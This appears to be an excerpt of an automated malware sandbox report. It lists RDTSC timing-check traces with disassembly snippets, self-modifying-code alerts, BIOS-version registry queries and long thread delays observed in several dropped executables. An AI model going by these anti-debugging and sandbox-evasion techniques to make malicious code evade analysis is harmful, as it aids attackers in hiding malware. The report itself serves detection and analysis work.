                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E60F0 second address: 12E60F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E60F8 second address: 12E60FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6266 second address: 12E6271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6271 second address: 12E6275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6275 second address: 12E62A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD358DA46E7h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 jo 00007FD358DA46D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6C75 second address: 12E6C85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FD358ED10F6h 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6E0D second address: 12E6E34 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD358DA46D6h 0x00000008 jc 00007FD358DA46D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FD358DA46DDh 0x00000015 popad 0x00000016 jo 00007FD358DA46EAh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E6E34 second address: 12E6E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12ACCBA second address: 12ACCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E7210 second address: 12E7215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E787A second address: 12E7885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E7885 second address: 12E789F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push edx 0x00000007 jmp 00007FD358ED10FDh 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E789F second address: 12E78A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E7E38 second address: 12E7E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E7E3E second address: 12E7E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EAC32 second address: 12EAC38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E99B9 second address: 12E99BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E99BE second address: 12E99C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E99C4 second address: 12E99C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB2CE second address: 12EB2FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD358ED10FCh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD358ED1107h 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB2FB second address: 12EB300 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB300 second address: 12EB306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB306 second address: 12EB32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD358DA46E7h 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB32A second address: 12EB32F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB32F second address: 12EB335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB335 second address: 12EB34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FD358ED10FCh 0x00000011 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB46E second address: 12EB472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12EB472 second address: 12EB48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD358ED10FCh 0x0000000c jo 00007FD358ED10F6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007FD358ED10F6h 0x0000001d rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12A7C7E second address: 12A7C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12A7C82 second address: 12A7CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1106h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007FD358ED10F6h 0x00000012 jmp 00007FD358ED10FCh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12A7CB6 second address: 12A7CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD358DA46D6h 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F2C67 second address: 12F2C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 ja 00007FD358ED10FCh 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007FD358ED1103h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F2C91 second address: 12F2C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F2E16 second address: 12F2E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F2E1C second address: 12F2E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F60ED second address: 12F60F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F60F1 second address: 12F60FB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F6286 second address: 12F628C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F67A1 second address: 12F67A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F67A5 second address: 12F67AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F6CDB second address: 12F6CFE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD358DA46E0h 0x00000008 jmp 00007FD358DA46DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebx 0x00000012 xor dword ptr [ebp+122D27F8h], edx 0x00000018 push eax 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F6CFE second address: 12F6D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F6D56 second address: 12F6D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F7011 second address: 12F7015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F7015 second address: 12F701B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F701B second address: 12F7020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F7020 second address: 12F7026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F77E9 second address: 12F77FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358ED1102h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F77FF second address: 12F7856 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f je 00007FD358DA46DCh 0x00000015 mov dword ptr [ebp+124591AEh], edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FD358DA46D8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 mov edi, eax 0x00000039 or dword ptr [ebp+122D1CAAh], ebx 0x0000003f push 00000000h 0x00000041 mov edi, dword ptr [ebp+122D1FA2h] 0x00000047 mov edi, 4491127Ch 0x0000004c push eax 0x0000004d push ecx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F92A2 second address: 12F92A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F92A8 second address: 12F92AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F92AC second address: 12F9327 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FD358ED10F8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push esi 0x00000028 pushad 0x00000029 mov edi, dword ptr [ebp+122D2448h] 0x0000002f mov dword ptr [ebp+122D2814h], ebx 0x00000035 popad 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 jmp 00007FD358ED1107h 0x0000003e jne 00007FD358ED10FCh 0x00000044 xchg eax, ebx 0x00000045 jmp 00007FD358ED10FCh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d js 00007FD358ED10FCh 0x00000053 je 00007FD358ED10F6h 0x00000059 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F9327 second address: 12F9331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD358DA46D6h 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F8A5D second address: 12F8A7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FD358ED10FBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FD358ED10F6h 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12F9C28 second address: 12F9C2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12FBE84 second address: 12FBE89 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12FBE89 second address: 12FBE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12FBF43 second address: 12FBF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12FB176 second address: 12FB1A2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD358DA46EEh 0x00000008 jmp 00007FD358DA46E8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 jo 00007FD358DA46DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12FC9CA second address: 12FCA6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FD358ED10F6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnc 00007FD358ED110Fh 0x00000013 nop 0x00000014 mov dword ptr [ebp+1245D0C5h], edi 0x0000001a push 00000000h 0x0000001c jl 00007FD358ED10FCh 0x00000022 mov dword ptr [ebp+122D1CD7h], edx 0x00000028 push 00000000h 0x0000002a ja 00007FD358ED10FCh 0x00000030 add dword ptr [ebp+1245D0CAh], ebx 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 jnp 00007FD358ED110Dh 0x0000003e jne 00007FD358ED1109h 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FD358ED1100h 0x0000004f rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12FCA6D second address: 12FCA73 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12B3954 second address: 12B395A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12B395A second address: 12B397E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007FD358DA46E2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jl 00007FD358DA46EAh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Tries to evade debugger and weak emulator (self modifying code)
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSpecial instruction interceptor: First address: D28B7D instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSpecial instruction interceptor: First address: D28C41 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSpecial instruction interceptor: First address: EF694A instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSpecial instruction interceptor: First address: EDF4A6 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSpecial instruction interceptor: First address: 113FCA0 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSpecial instruction interceptor: First address: 12EB130 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSpecial instruction interceptor: First address: 1314B36 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSpecial instruction interceptor: First address: 12F4C86 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSpecial instruction interceptor: First address: 137473D instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSpecial instruction interceptor: First address: EDEA81 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSpecial instruction interceptor: First address: EDE96D instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSpecial instruction interceptor: First address: 1081E52 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSpecial instruction interceptor: First address: 10AEC18 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: FBEA81 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: FBE96D instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 1161E52 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 118EC18 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeSpecial instruction interceptor: First address: 72EA81 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeSpecial instruction interceptor: First address: 72E96D instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeSpecial instruction interceptor: First address: 8D1E52 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeSpecial instruction interceptor: First address: 8FEC18 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSpecial instruction interceptor: First address: C6EA81 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSpecial instruction interceptor: First address: C6E96D instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSpecial instruction interceptor: First address: E11E52 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSpecial instruction interceptor: First address: E3EC18 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeMemory allocated: 1290000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeMemory allocated: 2FE0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeMemory allocated: 2F20000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_054C0CA7 rdtsc 5_2_054C0CA7
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 598111
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 597950
